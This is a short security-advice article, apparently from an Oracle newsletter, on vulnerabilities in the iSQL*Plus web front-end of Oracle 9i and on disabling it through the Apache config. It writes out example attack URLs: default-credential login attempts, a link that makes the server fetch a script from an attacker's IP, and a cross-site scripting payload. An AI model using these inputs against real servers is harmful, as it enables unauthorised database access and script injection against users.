This article originally appeared in the Oracle e-newsletter. Click here to subscribe automatically.

iSQL*Plus is a small HTML Web
interface front-end that uses SQL*Plus as the backend. It was
intended as a way of easily generating HTML reports through a Web
service using existing SQL*Plus scripts. By default,
iSQL*Plus is installed (and enabled) along with the Apache
HTTP server that comes with Oracle 9i.

Many security agencies recently reported
several vulnerabilities with this server. Depending on your
environment, you may want to disable iSQL*Plus to prevent
exploits against this vulnerability.

First, check to see if iSQL*Plus is
running. Try entering the URL http://<hostname>:<port>/isqlplus
…, where <hostname> is the name or IP address of the host
with Oracle 9i HTTP
server installed and <port> is the port number the server is
listening on, which is 80 by default. For example, on my Windows
machine with a fresh Oracle 9i installation, I would
enter http://127.0.0.1/isqlplus.
If you get a page with login fields, then you have iSQL*Plus
installed and running. You should consider the vulnerability issues
before allowing it to run on your machine.

The first vulnerability is the buffer overflow
problem. If hackers can access the main page, they can send a very
long input to username and password and overflow into the stack and
return address. A knowledgeable hacker can run arbitrary code
within the security context of the Apache server, such as “SYSTEM”
under Windows or “oracle” under UNIX. Oracle already addressed this
issue by providing a downloadable patch (with issue number 2581911)
at OracleMetaLink. The patch for
this problem doesn’t seem to be available in any default versions
so far.

A second vulnerability is the fact that this
screen exists at all. It’s an opportunity for someone with access
to your Web site to test which username/password combinations are
valid on your database. For instance, I could test http://127.0.0.1/isqlplus?userid=scott/tiger
and http://127.0.0.1/isqlplus?userid=system/manager.
If I get in using a database account, I can access any table in the
database, provided I know the name.

A third vulnerability is the fact that
iSQL*Plus can open a script via the URL, creating the
possibility of creating cross-site vulnerabilities. For example, if
I get a user to click on the link http://127.0.0.1/isqlplus?userid=scott/tiger&script=http://192.168.168.244/foo.pl,
my Web server, which contains the Perl script foo.pl, can pass back
a valid SQL script to run against your database. But I could also
receive all the HTTP header information from your server’s Web site
requesting the document.

Another vulnerability in iSQL*Plus is
due to the fact that the iSQL*Plus runs JavaScript in the
page, which can be intercepted to run arbitrary JavaScript code.
For an example from the official alert, try typing the URL http://127.0.0.1/isqlplus?action=<script>alert(‘This%20could%20have%20been%20a%20hacker’)</script>
into a JavaScript browser. You should see an error in the page and
a pop-up alert box.

Unless you have a specific need for
iSQL*Plus, and your Web site running Oracle’s Apache server
is completely secure, I recommend that you disable iSQL*Plus
and use the command line or Windows version of SQL*Plus. To disable
iSQL*Plus, you can simply comment out the following line
from the oracle_apache.conf file
that should reside in ?/Apache/Apache/conf:

include “<oracle
home>/sqlplus/admin/isqlplus.conf”

You should replace the <oracle home> in
this code with your actual Oracle Home directory. If you really
need to use iSQL*Plus, you should at least consider hiding
the usual configuration. If you try to search for “isqlplus” on a
search engine, you may see a couple of people who had their
/isqlplus directory listed. You can change the directory that is
mapped to iSQL*Plus in the isqlplus.conf file listed
above.

Scott Stephens worked for Oracle for more than 13 years in technical support, e-commerce, marketing, and software development. For more of his Oracle tips, visit our Oracle Dev Tips Library.